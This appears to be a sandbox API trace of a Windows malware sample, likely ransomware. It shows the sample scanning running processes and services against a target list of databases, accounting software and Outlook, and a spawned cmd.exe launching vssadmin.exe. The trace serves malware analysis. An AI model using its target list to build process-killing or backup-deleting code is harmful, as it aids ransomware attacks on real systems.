	[0035.231] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0035.231] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0035.231] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0035.232] lstrlenW (lpString="smss.exe") returned 8
	[0035.232] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0035.232] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0035.232] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0035.232] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0035.232] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0035.232] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0035.232] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0035.232] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0035.232] lstrlenW (lpString="csrss.exe") returned 9
	[0035.232] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0035.232] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0035.232] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0035.232] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0035.232] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0035.232] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0035.232] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0035.232] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0035.233] lstrlenW (lpString="wininit.exe") returned 11
	[0035.233] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0035.233] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0035.233] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0035.233] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0035.233] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0035.233] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0035.233] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0035.233] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0035.233] lstrlenW (lpString="csrss.exe") returned 9
	[0035.234] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0035.234] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0035.234] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0035.234] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0035.234] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0035.234] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0035.234] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0035.234] lstrlenW (lpString="winlogon.exe") returned 12
	[0035.234] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0035.235] lstrlenW (lpString="services.exe") returned 12
	[0035.235] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0035.235] lstrlenW (lpString="lsass.exe") returned 9
	[0035.235] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0035.236] lstrlenW (lpString="lsm.exe") returned 7
	[0035.236] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0035.236] lstrlenW (lpString="svchost.exe") returned 11
	[0035.236] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0035.236] lstrlenW (lpString="svchost.exe") returned 11
	[0035.237] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0035.237] lstrlenW (lpString="svchost.exe") returned 11
	[0035.237] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0035.237] lstrlenW (lpString="svchost.exe") returned 11
	[0035.237] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0035.238] lstrlenW (lpString="svchost.exe") returned 11
	[0035.238] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0035.238] lstrlenW (lpString="audiodg.exe") returned 11
	[0035.238] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0035.239] lstrlenW (lpString="svchost.exe") returned 11
	[0035.239] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0035.239] lstrlenW (lpString="svchost.exe") returned 11
	[0035.239] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0035.240] lstrlenW (lpString="dwm.exe") returned 7
	[0035.240] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0035.240] lstrlenW (lpString="explorer.exe") returned 12
	[0035.240] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0035.241] lstrlenW (lpString="spoolsv.exe") returned 11
	[0035.241] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0035.241] lstrlenW (lpString="taskhost.exe") returned 12
	[0035.241] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0035.241] lstrlenW (lpString="svchost.exe") returned 11
	[0035.242] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0035.242] lstrlenW (lpString="taskeng.exe") returned 11
	[0035.242] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0035.242] lstrlenW (lpString="taskhost.exe") returned 12
	[0035.242] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="encoding hanging.exe")) returned 1
	[0035.243] lstrlenW (lpString="encoding hanging.exe") returned 20
	[0035.243] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="python tragedy.exe")) returned 1
	[0035.243] lstrlenW (lpString="python tragedy.exe") returned 18
	[0035.243] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="talent-mastercard.exe")) returned 1
	[0035.244] lstrlenW (lpString="talent-mastercard.exe") returned 21
	[0035.244] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="computers.exe")) returned 1
	[0035.244] lstrlenW (lpString="computers.exe") returned 13
	[0035.244] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="separated.exe")) returned 1
	[0035.245] lstrlenW (lpString="separated.exe") returned 13
	[0035.245] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="disks executives interval.exe")) returned 1
	[0035.245] lstrlenW (lpString="disks executives interval.exe") returned 29
	[0035.245] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="darkness.exe")) returned 1
	[0035.246] lstrlenW (lpString="darkness.exe") returned 12
	[0035.246] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="crafts-distinct.exe")) returned 1
	[0035.246] lstrlenW (lpString="crafts-distinct.exe") returned 19
	[0035.246] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sophisticated.exe")) returned 1
	[0035.247] lstrlenW (lpString="sophisticated.exe") returned 17
	[0035.247] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wishlist.exe")) returned 1
	[0035.247] lstrlenW (lpString="wishlist.exe") returned 12
	[0035.247] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="top.exe")) returned 1
	[0035.247] lstrlenW (lpString="top.exe") returned 7
	[0035.248] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="implemented.exe")) returned 1
	[0035.248] lstrlenW (lpString="implemented.exe") returned 15
	[0035.248] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="comp.exe")) returned 1
	[0035.248] lstrlenW (lpString="comp.exe") returned 8
	[0035.248] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="synthetic_memphis.exe")) returned 1
	[0035.249] lstrlenW (lpString="synthetic_memphis.exe") returned 21
	[0035.249] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solved.exe")) returned 1
	[0035.249] lstrlenW (lpString="solved.exe") returned 10
	[0035.249] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bosnia resolution.exe")) returned 1
	[0035.250] lstrlenW (lpString="bosnia resolution.exe") returned 21
	[0035.250] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trips.exe")) returned 1
	[0035.250] lstrlenW (lpString="trips.exe") returned 9
	[0035.250] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tumormanual.exe")) returned 1
	[0035.251] lstrlenW (lpString="tumormanual.exe") returned 15
	[0035.251] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x494, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="telecom.exe")) returned 1
	[0035.251] lstrlenW (lpString="telecom.exe") returned 11
	[0035.251] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="realistic.exe")) returned 1
	[0035.252] lstrlenW (lpString="realistic.exe") returned 13
	[0035.252] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0035.252] lstrlenW (lpString="WmiPrvSE.exe") returned 12
	[0035.252] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0035.253] lstrlenW (lpString="dllhost.exe") returned 11
	[0035.253] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0035.253] lstrlenW (lpString="dllhost.exe") returned 11
	[0035.253] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0035.253] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0035.254] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x934, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0035.254] lstrlenW (lpString="cmd.exe") returned 7
	[0035.254] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0035.254] lstrlenW (lpString="conhost.exe") returned 11
	[0035.254] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x948, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1
	[0035.255] lstrlenW (lpString="vssadmin.exe") returned 12
	[0035.255] Process32NextW (in: hSnapshot=0x17c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x948, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0
	[0035.255] CloseHandle (hObject=0x17c) returned 1
	[0035.256] Sleep (dwMilliseconds=0x1f4) 
	[0036.060] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x7df3198
	[0036.061] EnumServicesStatusExW (in: hSCManager=0x7df3198, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 0
	[0036.062] GetLastError () returned 0xea
	[0036.062] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x11e4) returned 0x7e5ca88
	[0036.062] EnumServicesStatusExW (in: hSCManager=0x7df3198, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x7e5ca88, cbBufSize=0x11e4, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x7e5ca88, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 1
	[0036.063] CloseServiceHandle (hSCObject=0x7df3198) returned 1
	[0036.063] lstrlenW (lpString="Appinfo") returned 7
	[0036.063] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0036.063] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0036.063] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0036.063] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0036.063] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0036.063] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0036.063] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0036.063] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0036.063] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0036.063] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0036.063] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0036.063] lstrlenW (lpString="AudioSrv") returned 8
	[0036.063] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0036.063] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0036.063] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0036.063] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0036.063] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0036.063] lstrlenW (lpString="BFE") returned 3
	[0036.064] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0036.064] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0036.064] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0036.064] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0036.064] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0036.064] lstrlenW (lpString="CryptSvc") returned 8
	[0036.064] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0036.064] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0036.064] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0036.064] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0036.064] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0036.064] lstrlenW (lpString="CscService") returned 10
	[0036.064] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0036.064] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0036.064] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0036.064] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0036.064] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0036.064] lstrlenW (lpString="DcomLaunch") returned 10
	[0036.064] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0036.064] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0036.064] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0036.064] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0036.064] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0036.064] lstrlenW (lpString="Dhcp") returned 4
	[0036.064] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0036.064] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0036.064] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0036.064] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0036.064] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0036.064] lstrlenW (lpString="Dnscache") returned 8
	[0036.064] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
